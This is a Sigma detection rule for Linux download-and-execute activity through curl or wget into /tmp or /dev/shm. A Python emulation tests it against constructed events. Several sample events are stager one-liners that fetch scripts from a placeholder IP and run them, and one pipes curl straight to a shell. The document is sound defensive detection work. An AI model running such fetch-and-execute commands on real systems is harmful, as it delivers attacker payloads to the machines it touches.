Suspicious Download and Execute Pattern via Curl/Wget

Original Source: [Sigma source]
Title: Suspicious Download and Execute Pattern via Curl/Wget
Status: experimental
Description: Detects suspicious use of command-line tools such as curl or wget to download remote content, particularly scripts, into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, which indicates potentially malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
References:
  - https://gtfobins.github.io/gtfobins/wget/
  - https://gtfobins.github.io/gtfobins/curl/
Author: Aayush Gupta
Date: 2025-06-17
Modified: None
Tags:
  - 'attack.execution'
  - 'attack.t1059.004'
  - 'attack.t1203'
Logsource:
  • category: process_creation
  • product: linux
Detection:
  selection_downloader:
    CommandLine|contains:
      - '/curl'
      - '/wget'

  selection_tmp:
    CommandLine|contains:
      - '/tmp/'
      - '/dev/shm/'

  selection_executor:
    CommandLine|contains: 'sh -c'
  condition: all of selection_*
Falsepositives:
  - System update scripts using temporary files
  - Installer scripts or automated provisioning tools
Level: high
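The following is an added example, not part of the Sigma rule or its author's material: it emulates the rule's three selections and the `all of selection_*` condition in Python and runs them over a handful of constructed Linux process_creation events (the command lines, paths and the documentation-range IP 198.51.100.7 are invented for illustration). It assumes Sigma's default case-insensitive substring semantics for `|contains`, which the comments state.

```python
"""Emulate the 'Suspicious Download and Execute Pattern via Curl/Wget' Sigma rule
over constructed process_creation events.

Assumption: Sigma string matching is case-insensitive by default (no |cased
modifier in the rule), so every comparison below lower-cases both sides.
All events are constructed for this example; none is real telemetry.
"""
from typing import Dict, List

# Substrings copied verbatim from the rule's three selections.
SELECTION_DOWNLOADER = ("/curl", "/wget")
SELECTION_TMP = ("/tmp/", "/dev/shm/")
SELECTION_EXECUTOR = ("sh -c",)


def _contains_any(value: str, needles) -> bool:
    """Sigma 'field|contains: [a, b]' is an OR across the list values."""
    lowered = value.lower()
    return any(n.lower() in lowered for n in needles)


def explain(event: Dict[str, str]) -> Dict[str, bool]:
    """Per-selection breakdown of one event; handy when triaging why a line fired."""
    cmd = event.get("CommandLine", "")
    return {
        "selection_downloader": _contains_any(cmd, SELECTION_DOWNLOADER),
        "selection_tmp": _contains_any(cmd, SELECTION_TMP),
        "selection_executor": _contains_any(cmd, SELECTION_EXECUTOR),
    }


def matches_rule(event: Dict[str, str]) -> bool:
    """condition: all of selection_*  ->  every selection must match the same CommandLine."""
    return all(explain(event).values())


# Constructed sample events (only CommandLine matters to this rule).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 0. Classic stager: download into /tmp, chmod, execute, all under one sh -c. Fires.
    {"Image": "/bin/sh",
     "CommandLine": "sh -c '/usr/bin/curl -s http://198.51.100.7/x.sh -o /tmp/x.sh && chmod +x /tmp/x.sh && /tmp/x.sh'"},
    # 1. wget into /dev/shm under bash -c. 'bash -c' contains the substring 'sh -c', so it fires too.
    {"Image": "/bin/bash",
     "CommandLine": "bash -c '/usr/bin/wget -q -O /dev/shm/.p http://198.51.100.7/p; sh /dev/shm/.p'"},
    # 2. curl piped straight into a shell with no temp path: selection_tmp never matches, no alert.
    {"Image": "/bin/sh",
     "CommandLine": "sh -c '/usr/bin/curl -fsSL http://198.51.100.7/i.sh | sh'"},
    # 3. The curl child process on its own: its command line has no 'sh -c', so no alert.
    {"Image": "/usr/bin/curl",
     "CommandLine": "/usr/bin/curl -s http://198.51.100.7/x.sh -o /tmp/x.sh"},
    # 4. Benign provisioning step of the kind listed under Falsepositives. Fires.
    {"Image": "/bin/sh",
     "CommandLine": "sh -c '/usr/bin/curl -sSL https://example.com/installer.sh -o /tmp/install.sh && sh /tmp/install.sh'"},
    # 5. Bare 'curl' (resolved via PATH, no leading slash) misses selection_downloader. No alert.
    {"Image": "/bin/sh",
     "CommandLine": "sh -c 'curl -s http://198.51.100.7/x.sh -o /tmp/x.sh && sh /tmp/x.sh'"},
]


def run(events: List[Dict[str, str]]) -> List[int]:
    """Return the indices of the events that trigger the rule."""
    return [i for i, e in enumerate(events) if matches_rule(e)]


if __name__ == "__main__":
    for i, e in enumerate(SAMPLE_EVENTS):
        flag = "ALERT" if matches_rule(e) else "     "
        print(f"{flag} [{i}] {e['CommandLine']}")
    print("Fired on events:", run(SAMPLE_EVENTS))
```

Three properties of the rule fall out of running this: the alert is raised on the shell process that was started with `-c` (the parent carrying the whole one-liner), not on the curl or wget child, so the telemetry must log the full parent command line; `sh -c` also matches `bash -c`, `dash -c` and `zsh -c` by substring; and a `curl ... | sh` stager that never touches /tmp or /dev/shm, or one that invokes `curl` by bare name, does not fire, so this rule should sit beside a pipe-to-shell detection rather than replace one.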